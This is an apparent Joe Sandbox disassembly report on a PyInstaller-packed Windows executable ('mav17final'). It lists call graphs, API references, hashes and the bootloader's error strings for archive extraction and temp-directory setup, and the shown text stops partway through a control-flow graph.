Function call graph (graph-viewer edge list; node ids, addresses and edge pairs omitted). Windows API functions that appear as graph nodes: GetFullPathNameW, GetDriveTypeW, GetCurrentDirectoryW, EnterCriticalSection, LeaveCriticalSection, MessageBoxA, MessageBoxW, GetLastError, SetLastError, IsProcessorFeaturePresent, CreateFileW, GetFileType, GetFileInformationByHandle, PeekNamedPipe, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, RtlAllocateHeap, MultiByteToWideChar, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, LoadLibraryExW, GetProcAddress, FreeLibrary, GetModuleHandleW, GetModuleHandleExW, FindFirstFileExW, FindNextFileW. CRT-internal functions named in the graph: _wfindfirst32i64, _fread_nolock, _invalid_parameter_noinfo, memcpy_s, __scrt_get_show_window_mode, __vcrt_freefls, try_get_function, Concurrency::details::SchedulerProxy::DeleteThis.

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 435049134-239921721
                                                  • Opcode ID: e7c50473f2d1b68994f71ab5a92372937e29ed2205e94bdf24f420ae8b7c5c88
                                                  • Instruction ID: 3f1d05117fe9848d03c93c5805853d37ee66a3fcb08faeaeaf589f156a3d12bc
                                                  • Opcode Fuzzy Hash: e7c50473f2d1b68994f71ab5a92372937e29ed2205e94bdf24f420ae8b7c5c88
                                                  • Instruction Fuzzy Hash: A2B1C126F18A5285E730FF3299C097EA661EBA5B84F804135EA4D437A5DF3DE4418770

                                                  Control-flow Graph

                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF79EA4154F), ref: 00007FF79EA478E7
                                                    • Part of subcall function 00007FF79EA47A60: GetEnvironmentVariableW.KERNEL32(00007FF79EA439EF), ref: 00007FF79EA47A9A
                                                    • Part of subcall function 00007FF79EA47A60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79EA47AB7
                                                    • Part of subcall function 00007FF79EA53A04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA53A1D
                                                  • SetEnvironmentVariableW.KERNEL32 ref: 00007FF79EA479A1
                                                    • Part of subcall function 00007FF79EA42B30: MessageBoxW.USER32 ref: 00007FF79EA42C01
                                                  Strings
                                                  Similarity
                                                  • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                  • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                  • API String ID: 3752271684-1116378104
                                                  • Opcode ID: cc5afa02db89ddc83501fa16cb079789694df4e71eccec7261dd1a3086ea0bde
                                                  • Instruction ID: 594b17c6973fefa9f700aff95bea9c17dcc8abda59e3d4f6f046d026e027b854
                                                  • Opcode Fuzzy Hash: cc5afa02db89ddc83501fa16cb079789694df4e71eccec7261dd1a3086ea0bde
                                                  • Instruction Fuzzy Hash: 2B516D61B0968251FAB4B7326891ABED292DF85BD4FC45031FD0E4B7A7ED2CE4058370

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _get_daylight_invalid_parameter_noinfo$InformationLanguagesPreferredRestoreThreadTimeZone
                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                  • API String ID: 1896592209-239921721
                                                  • Opcode ID: e1c1c7a162c756eaab80c75e9d554066937552a0643beb88d9c76aad1a05689b
                                                  • Instruction ID: b9dc869ddf1034e5d895449248d22639bac0ef97427e5dc2fae6a1bf4150e471
                                                  • Opcode Fuzzy Hash: e1c1c7a162c756eaab80c75e9d554066937552a0643beb88d9c76aad1a05689b
                                                  • Instruction Fuzzy Hash: F6617E32E18A4286E770FF31D9C19B9A761EBA9B84F804135EA4D43BA5DF3DE4418770
                                                  APIs
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: fd09611004a722f78990fd31eac2e868677f50c986bcb1b3b02d4ba43189d950
                                                  • Instruction ID: 8344d03b3d1b530d8e1f6fbcf2db9e40ff0a722b6d5445c8cd2fe83b7b45093b
                                                  • Opcode Fuzzy Hash: fd09611004a722f78990fd31eac2e868677f50c986bcb1b3b02d4ba43189d950
                                                  • Instruction Fuzzy Hash: B5014431A1998186F7B0AB30F49977AB3A0EB857A4FC04335D66D436E5DF3CD0098B20
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21c370f8ab2909275d10110dd99fbc6577511caaf5376d97bbda2fb82b934d79
                                                  • Instruction ID: ffe4f390e6a310e01bb35cce1e367b5ab2c84a427e3635c6b45eff464a8448ed
                                                  • Opcode Fuzzy Hash: 21c370f8ab2909275d10110dd99fbc6577511caaf5376d97bbda2fb82b934d79
                                                  • Instruction Fuzzy Hash: 0802BA61E1964380EE70BB35A885A3DA681EF41BA0FC84635DE6D477F9EE3DA4018330

                                                  Control-flow Graph

                                                  Strings
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                  • API String ID: 2030045667-3833288071
                                                  • Opcode ID: 41bcd50f58ba6945afefbac69a197c6087a234d6bd2d16567869e118860fe969
                                                  • Instruction ID: c4997af73b388bcc28a2872c67de1a20f62466076905234dca37b507a2c4f7a6
                                                  • Opcode Fuzzy Hash: 41bcd50f58ba6945afefbac69a197c6087a234d6bd2d16567869e118860fe969
                                                  • Instruction Fuzzy Hash: D1516F61B0CA4285EB30BB35E490AB9E391EFA5B94FC44531DE0D4B6B6EE2CE5458730

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000100000001,00007FF79EA4411C,00007FF79EA47811,?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA48890
                                                  • OpenProcessToken.ADVAPI32(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA488A1
                                                  • GetTokenInformation.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA488C3
                                                  • GetLastError.KERNEL32(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA488CD
                                                  • GetTokenInformation.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA4890A
                                                  • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF79EA4891C
                                                  • FindCloseChangeNotification.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA48934
                                                  • LocalFree.KERNEL32(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA48966
                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF79EA4898D
                                                  • CreateDirectoryW.KERNELBASE(?,00007FF79EA47C26,?,00007FF79EA41785), ref: 00007FF79EA4899E
                                                  Strings
                                                  Similarity
                                                  • API ID: Token$ConvertDescriptorInformationProcessSecurityString$ChangeCloseCreateCurrentDirectoryErrorFindFreeLastLocalNotificationOpen
                                                  • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                  • API String ID: 2187719417-2855260032
                                                  • Opcode ID: d78f49ae4b380411a75aa6cbb447eda7484dc81e76002bff55da3e5cee019735
                                                  • Instruction ID: afe01fa4ae117a4522db3966b5b7bd48ad67de0ab2af18032845b44b6bbc953c
                                                  • Opcode Fuzzy Hash: d78f49ae4b380411a75aa6cbb447eda7484dc81e76002bff55da3e5cee019735
                                                  • Instruction Fuzzy Hash: 0241863161CA8296EB60AF71F484ABAA360FF857A4F844231FA5E476A5DF3CD444C770

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _fread_nolock$Message
                                                  • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                  • API String ID: 677216364-1384898525
                                                  • Opcode ID: 9a8dc730619d31249d4015af2233e25f710a46ce78a2e0685fa874a19269a1b3
                                                  • Instruction ID: 855ca5f9b9d808a4f8022a37c09d0e7fcb28d44e07af34c432bdf1ca628f1131
                                                  • Opcode Fuzzy Hash: 9a8dc730619d31249d4015af2233e25f710a46ce78a2e0685fa874a19269a1b3
                                                  • Instruction Fuzzy Hash: 5F516D72A09A4286EB34EF38D480979B7A0EF99B84B958135D90C877B5EE7CE440C774

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                  • String ID: CreateProcessW$Error creating child process!
                                                  • API String ID: 2895956056-3524285272
                                                  • Opcode ID: d825b08e7f8213722baccb384613801bfeab442e381f962a1bcb54389bddb714
                                                  • Instruction ID: 4bafa1708d03494297710f46d231288fe9535f64fb372bdb7e0868060b8a2040
                                                  • Opcode Fuzzy Hash: d825b08e7f8213722baccb384613801bfeab442e381f962a1bcb54389bddb714
                                                  • Instruction Fuzzy Hash: 54413031A08B8285DA30AB34E4956BEF365FBD5764F800735E6AD43AE5DF7CD0448B20

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                  • String ID:
                                                  • API String ID: 1330151763-0
                                                  • Opcode ID: 82e8923be977671dc85c0f7899ee02d888d5c39806c92afe536ffb1660ddf0a1
                                                  • Instruction ID: 8ddb0447a964789afe4150fe224b385eb3c1a40bbe445b744a62a1c515453d39
                                                  • Opcode Fuzzy Hash: 82e8923be977671dc85c0f7899ee02d888d5c39806c92afe536ffb1660ddf0a1
                                                  • Instruction Fuzzy Hash: C0C1B036B24E4289EB60DF74C490ABC7760EB59BA8B514239DA1E477E4DF38D451C330

                                                  Control-flow Graph

                                                  control_flow_graph 381 7ff79ea41000-7ff79ea439a6 call 7ff79ea4de20 call 7ff79ea4de18 call 7ff79ea485b0 call 7ff79ea4de18 call 7ff79ea4bb90 call 7ff79ea51230 call 7ff79ea51dd4 call 7ff79ea41eb0 399 7ff79ea439ac-7ff79ea439bc call 7ff79ea43e90 381->399 400 7ff79ea43aa2 381->400 399->400 406 7ff79ea439c2-7ff79ea439d5 call 7ff79ea43d60 399->406 402 7ff79ea43aa7-7ff79ea43ac7 call 7ff79ea4bbf0 400->402 406->400 409 7ff79ea439db-7ff79ea43a02 call 7ff79ea47a60 406->409 412 7ff79ea43a44-7ff79ea43a6c call 7ff79ea47f40 call 7ff79ea41cb0 409->412 413 7ff79ea43a04-7ff79ea43a13 call 7ff79ea47a60 409->413 424 7ff79ea43a72-7ff79ea43a88 call 7ff79ea41cb0 412->424 425 7ff79ea43b41-7ff79ea43b52 412->425 413->412 419 7ff79ea43a15-7ff79ea43a1b 413->419 421 7ff79ea43a27-7ff79ea43a41 call 7ff79ea50f4c call 7ff79ea47f40 419->421 422 7ff79ea43a1d-7ff79ea43a25 419->422 421->412 422->421 440 7ff79ea43a8a-7ff79ea43a9d call 7ff79ea42b30 424->440 441 7ff79ea43ac8-7ff79ea43acb 424->441 427 7ff79ea43b6e-7ff79ea43b71 425->427 428 7ff79ea43b54-7ff79ea43b5b 425->428 432 7ff79ea43b87-7ff79ea43b9f call 7ff79ea489e0 427->432 433 7ff79ea43b73-7ff79ea43b79 427->433 428->427 431 7ff79ea43b5d-7ff79ea43b60 call 7ff79ea414f0 428->431 444 7ff79ea43b65-7ff79ea43b68 431->444 449 7ff79ea43bb2-7ff79ea43bb9 SetDllDirectoryW 432->449 450 7ff79ea43ba1-7ff79ea43bad call 7ff79ea42b30 432->450 437 7ff79ea43b7b-7ff79ea43b85 433->437 438 7ff79ea43bbf-7ff79ea43bcc call 7ff79ea46ce0 433->438 437->432 437->438 451 7ff79ea43c17-7ff79ea43c1c call 7ff79ea46c60 438->451 452 7ff79ea43bce-7ff79ea43bdb call 7ff79ea46990 438->452 440->400 441->425 443 7ff79ea43acd-7ff79ea43ae4 call 7ff79ea43fa0 441->443 457 7ff79ea43aeb-7ff79ea43b17 call 7ff79ea481b0 443->457 458 7ff79ea43ae6-7ff79ea43ae9 443->458 444->400 444->427 449->438 450->400 460 7ff79ea43c21-7ff79ea43c24 451->460 452->451 466 7ff79ea43bdd-7ff79ea43bec call 7ff79ea464e0 452->466 457->425 472 7ff79ea43b19-7ff79ea43b21 call 7ff79ea4deac 457->472 462 7ff79ea43b26-7ff79ea43b3c call 7ff79ea42b30 458->462 464 7ff79ea43c2a-7ff79ea43c37 460->464 465 7ff79ea43cd6-7ff79ea43ce5 call 7ff79ea434a0 460->465 462->400 469 7ff79ea43c40-7ff79ea43c4a 464->469 465->400 483 7ff79ea43ceb-7ff79ea43d3f call 7ff79ea47ed0 call 7ff79ea47a60 call 7ff79ea43600 call 7ff79ea47f80 call 7ff79ea46740 call 7ff79ea46c60 465->483 481 7ff79ea43bee-7ff79ea43bfa call 7ff79ea46460 466->481 482 7ff79ea43c0d-7ff79ea43c12 call 7ff79ea46740 466->482 474 7ff79ea43c4c-7ff79ea43c51 469->474 475 7ff79ea43c53-7ff79ea43c55 469->475 472->462 474->469 474->475 479 7ff79ea43c57-7ff79ea43c7a call 7ff79ea41ef0 475->479 480 7ff79ea43ca1-7ff79ea43cd1 call 7ff79ea43600 call 7ff79ea43440 call 7ff79ea435f0 call 7ff79ea46740 call 7ff79ea46c60 475->480 479->400 494 7ff79ea43c80-7ff79ea43c8b 479->494 480->402 481->482 495 7ff79ea43bfc-7ff79ea43c0b call 7ff79ea46b30 481->495 482->451 517 7ff79ea43d4d-7ff79ea43d50 call 7ff79ea41e80 483->517 518 7ff79ea43d41-7ff79ea43d48 call 7ff79ea47c40 483->518 499 7ff79ea43c90-7ff79ea43c9f 494->499 495->460 499->480 499->499 521 7ff79ea43d55-7ff79ea43d57 517->521 518->517 521->402
                                                  APIs
                                                    • Part of subcall function 00007FF79EA43E90: GetModuleFileNameW.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA43EC1
                                                  • SetDllDirectoryW.KERNEL32 ref: 00007FF79EA43BB9
                                                    • Part of subcall function 00007FF79EA47A60: GetEnvironmentVariableW.KERNEL32(00007FF79EA439EF), ref: 00007FF79EA47A9A
                                                    • Part of subcall function 00007FF79EA47A60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79EA47AB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                  • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                  • API String ID: 2344891160-3602715111
                                                  • Opcode ID: 2969d0634b6313d4c6d91898a8dfdbe2d1d87c3fa11ef7abcc160afb7d176cef
                                                  • Instruction ID: 595b4d7a306f3047859b97e8deedfa621d74f07f5c65e5106c1185f4eb33f6d2
                                                  • Opcode Fuzzy Hash: 2969d0634b6313d4c6d91898a8dfdbe2d1d87c3fa11ef7abcc160afb7d176cef
                                                  • Instruction Fuzzy Hash: 4DB16D21A1CA8255EA34BB3199D1ABDD291FF94B84FC44131EA4D476B7FF2CE9098730

                                                  Control-flow Graph

                                                  control_flow_graph 522 7ff79ea41050-7ff79ea410ab call 7ff79ea4b3f0 525 7ff79ea410ad-7ff79ea410d2 call 7ff79ea42b30 522->525 526 7ff79ea410d3-7ff79ea410eb call 7ff79ea50f60 522->526 531 7ff79ea41109-7ff79ea41119 call 7ff79ea50f60 526->531 532 7ff79ea410ed-7ff79ea41104 call 7ff79ea42890 526->532 538 7ff79ea41137-7ff79ea41147 531->538 539 7ff79ea4111b-7ff79ea41132 call 7ff79ea42890 531->539 537 7ff79ea4126c-7ff79ea41281 call 7ff79ea4b0c0 call 7ff79ea50f4c * 2 532->537 555 7ff79ea41286-7ff79ea412a0 537->555 541 7ff79ea41150-7ff79ea41175 call 7ff79ea4e1c8 538->541 539->537 549 7ff79ea4125e 541->549 550 7ff79ea4117b-7ff79ea41185 call 7ff79ea4df3c 541->550 553 7ff79ea41264 549->553 550->549 556 7ff79ea4118b-7ff79ea41197 550->556 553->537 557 7ff79ea411a0-7ff79ea411c8 call 7ff79ea49870 556->557 560 7ff79ea411ca-7ff79ea411cd 557->560 561 7ff79ea41241-7ff79ea4125c call 7ff79ea42b30 557->561 562 7ff79ea4123c 560->562 563 7ff79ea411cf-7ff79ea411d9 560->563 561->553 562->561 565 7ff79ea411db-7ff79ea411e8 call 7ff79ea4e6f0 563->565 566 7ff79ea41203-7ff79ea41206 563->566 573 7ff79ea411ed-7ff79ea411f0 565->573 568 7ff79ea41219-7ff79ea4121e 566->568 569 7ff79ea41208-7ff79ea41216 call 7ff79ea4c960 566->569 568->557 572 7ff79ea41220-7ff79ea41223 568->572 569->568 575 7ff79ea41237-7ff79ea4123a 572->575 576 7ff79ea41225-7ff79ea41228 572->576 577 7ff79ea411fe-7ff79ea41201 573->577 578 7ff79ea411f2-7ff79ea411fc call 7ff79ea4df3c 573->578 575->553 576->561 579 7ff79ea4122a-7ff79ea41232 576->579 577->561 578->568 578->577 579->541
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                  • API String ID: 2030045667-1655038675
                                                  • Opcode ID: 3bbf6c18c64704fa27b000cda3f66458baf70d53aa8143dd7fbdc75dc1ea0fd3
                                                  • Instruction ID: 79bfe2abcdb0e317419bd2f1c58e4eae0ed1ad601f8a416e2668fcaff97126b2
                                                  • Opcode Fuzzy Hash: 3bbf6c18c64704fa27b000cda3f66458baf70d53aa8143dd7fbdc75dc1ea0fd3
                                                  • Instruction Fuzzy Hash: ED51B262A0CA8285EA70BB75A4C0BBAA290FBA5794FC44135DD4D877A5FF3CE505C730

                                                  Control-flow Graph

                                                  control_flow_graph 653 7ff79ea5726c-7ff79ea57292 654 7ff79ea572ad-7ff79ea572b1 653->654 655 7ff79ea57294-7ff79ea572a8 call 7ff79ea5135c call 7ff79ea5137c 653->655 656 7ff79ea572b7-7ff79ea572be 654->656 657 7ff79ea57690-7ff79ea5769c call 7ff79ea5135c call 7ff79ea5137c 654->657 669 7ff79ea576a7 655->669 656->657 659 7ff79ea572c4-7ff79ea572f6 656->659 676 7ff79ea576a2 call 7ff79ea567c8 657->676 659->657 663 7ff79ea572fc-7ff79ea57303 659->663 666 7ff79ea5731c-7ff79ea5731f 663->666 667 7ff79ea57305-7ff79ea57317 call 7ff79ea5135c call 7ff79ea5137c 663->667 672 7ff79ea5768c-7ff79ea5768e 666->672 673 7ff79ea57325-7ff79ea57327 666->673 667->676 674 7ff79ea576aa-7ff79ea576c1 669->674 672->674 673->672 677 7ff79ea5732d-7ff79ea57330 673->677 676->669 677->667 680 7ff79ea57332-7ff79ea57358 677->680 682 7ff79ea57397-7ff79ea5739f 680->682 683 7ff79ea5735a-7ff79ea5735d 680->683 686 7ff79ea57369-7ff79ea57380 call 7ff79ea5135c call 7ff79ea5137c call 7ff79ea567c8 682->686 687 7ff79ea573a1-7ff79ea573c9 call 7ff79ea58c00 call 7ff79ea56830 * 2 682->687 684 7ff79ea57385-7ff79ea57392 683->684 685 7ff79ea5735f-7ff79ea57367 683->685 689 7ff79ea5741b-7ff79ea5742e 684->689 685->684 685->686 717 7ff79ea57520 686->717 713 7ff79ea573cb-7ff79ea573e1 call 7ff79ea5137c call 7ff79ea5135c 687->713 714 7ff79ea573e6-7ff79ea57417 call 7ff79ea579c4 687->714 692 7ff79ea574aa-7ff79ea574b4 call 7ff79ea5f2b8 689->692 693 7ff79ea57430-7ff79ea57438 689->693 704 7ff79ea5753e 692->704 705 7ff79ea574ba-7ff79ea574cf 692->705 693->692 697 7ff79ea5743a-7ff79ea5743c 693->697 697->692 701 7ff79ea5743e-7ff79ea57455 697->701 701->692 706 7ff79ea57457-7ff79ea57463 701->706 709 7ff79ea57543-7ff79ea57563 ReadFile 704->709 705->704 711 7ff79ea574d1-7ff79ea574e3 GetConsoleMode 705->711 706->692 712 7ff79ea57465-7ff79ea57467 706->712 715 7ff79ea57569-7ff79ea57571 709->715 716 7ff79ea57656-7ff79ea5765f GetLastError 709->716 711->704 718 7ff79ea574e5-7ff79ea574ed 711->718 712->692 719 7ff79ea57469-7ff79ea57481 712->719 713->717 714->689 715->716 722 7ff79ea57577 715->722 725 7ff79ea5767c-7ff79ea5767f 716->725 726 7ff79ea57661-7ff79ea57677 call 7ff79ea5137c call 7ff79ea5135c 716->726 727 7ff79ea57523-7ff79ea5752d call 7ff79ea56830 717->727 718->709 724 7ff79ea574ef-7ff79ea57511 ReadConsoleW 718->724 719->692 720 7ff79ea57483-7ff79ea5748f 719->720 720->692 728 7ff79ea57491-7ff79ea57493 720->728 732 7ff79ea5757e-7ff79ea57593 722->732 734 7ff79ea57513 GetLastError 724->734 735 7ff79ea57532-7ff79ea5753c 724->735 729 7ff79ea57519-7ff79ea5751b call 7ff79ea5130c 725->729 730 7ff79ea57685-7ff79ea57687 725->730 726->717 727->674 728->692 739 7ff79ea57495-7ff79ea574a5 728->739 729->717 730->727 732->727 741 7ff79ea57595-7ff79ea575a0 732->741 734->729 735->732 739->692 745 7ff79ea575c7-7ff79ea575cf 741->745 746 7ff79ea575a2-7ff79ea575bb call 7ff79ea56e30 741->746 750 7ff79ea57644-7ff79ea57651 call 7ff79ea56be8 745->750 751 7ff79ea575d1-7ff79ea575e3 745->751 753 7ff79ea575c0-7ff79ea575c2 746->753 750->753 754 7ff79ea57637-7ff79ea5763f 751->754 755 7ff79ea575e5 751->755 753->727 754->727 757 7ff79ea575ea-7ff79ea575f1 755->757 758 7ff79ea5762d-7ff79ea57631 757->758 759 7ff79ea575f3-7ff79ea575f7 757->759 758->754 760 7ff79ea575f9-7ff79ea57600 759->760 761 7ff79ea57613 759->761 760->761 762 7ff79ea57602-7ff79ea57606 760->762 763 7ff79ea57619-7ff79ea57629 761->763 762->761 764 7ff79ea57608-7ff79ea57611 762->764 763->757 765 7ff79ea5762b 763->765 764->763 765->754
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 2ec5569ab8a1941f337aa7754c41b084211f8f693c721f6c053ec5d2037e5917
                                                  • Instruction ID: e473307a4ce31289bbb02661455efc58e014fa1f79a954deba553f59062b9e9b
                                                  • Opcode Fuzzy Hash: 2ec5569ab8a1941f337aa7754c41b084211f8f693c721f6c053ec5d2037e5917
                                                  • Instruction Fuzzy Hash: 62C1E462A0CA8685E670AB359484A7DFBA1EB90B90FD50131EA4E137B1DF7CEC55C330

                                                  Control-flow Graph

                                                  control_flow_graph 843 7ff79ea585b8-7ff79ea585dd 844 7ff79ea585e3-7ff79ea585e6 843->844 845 7ff79ea58881 843->845 846 7ff79ea585e8-7ff79ea58602 call 7ff79ea5135c call 7ff79ea5137c call 7ff79ea567c8 844->846 847 7ff79ea58607-7ff79ea5862e 844->847 848 7ff79ea58883-7ff79ea5889a 845->848 846->848 849 7ff79ea58639-7ff79ea5863f 847->849 850 7ff79ea58630-7ff79ea58637 847->850 852 7ff79ea5864f-7ff79ea5865d call 7ff79ea5f2b8 849->852 853 7ff79ea58641-7ff79ea5864a call 7ff79ea579c4 849->853 850->846 850->849 860 7ff79ea5876e-7ff79ea5877e 852->860 861 7ff79ea58663-7ff79ea58673 852->861 853->852 863 7ff79ea587cd-7ff79ea587f2 WriteFile 860->863 864 7ff79ea58780-7ff79ea58785 860->864 861->860 865 7ff79ea58679-7ff79ea5868c call 7ff79ea59630 861->865 870 7ff79ea587fd 863->870 871 7ff79ea587f4-7ff79ea587fa GetLastError 863->871 867 7ff79ea58787-7ff79ea5878a 864->867 868 7ff79ea587b9-7ff79ea587cb call 7ff79ea5813c 864->868 882 7ff79ea5868e-7ff79ea5869e 865->882 883 7ff79ea586a4-7ff79ea586c0 GetConsoleMode 865->883 872 7ff79ea5878c-7ff79ea5878f 867->872 873 7ff79ea587a5-7ff79ea587b7 call 7ff79ea5835c 867->873 888 7ff79ea58762-7ff79ea58769 868->888 876 7ff79ea58800 870->876 871->870 878 7ff79ea5880a-7ff79ea58814 872->878 879 7ff79ea58791-7ff79ea587a3 call 7ff79ea58240 872->879 873->888 877 7ff79ea58805 876->877 877->878 884 7ff79ea5887a-7ff79ea5887f 878->884 885 7ff79ea58816-7ff79ea5881b 878->885 879->888 882->860 882->883 883->860 889 7ff79ea586c6-7ff79ea586c9 883->889 884->848 890 7ff79ea5881d-7ff79ea58820 885->890 891 7ff79ea5884a-7ff79ea5885b 885->891 888->877 893 7ff79ea58750-7ff79ea5875d call 7ff79ea57c50 889->893 894 7ff79ea586cf-7ff79ea586d6 889->894 895 7ff79ea5883d-7ff79ea58845 call 7ff79ea5130c 890->895 896 7ff79ea58822-7ff79ea58832 call 7ff79ea5137c call 7ff79ea5135c 890->896 898 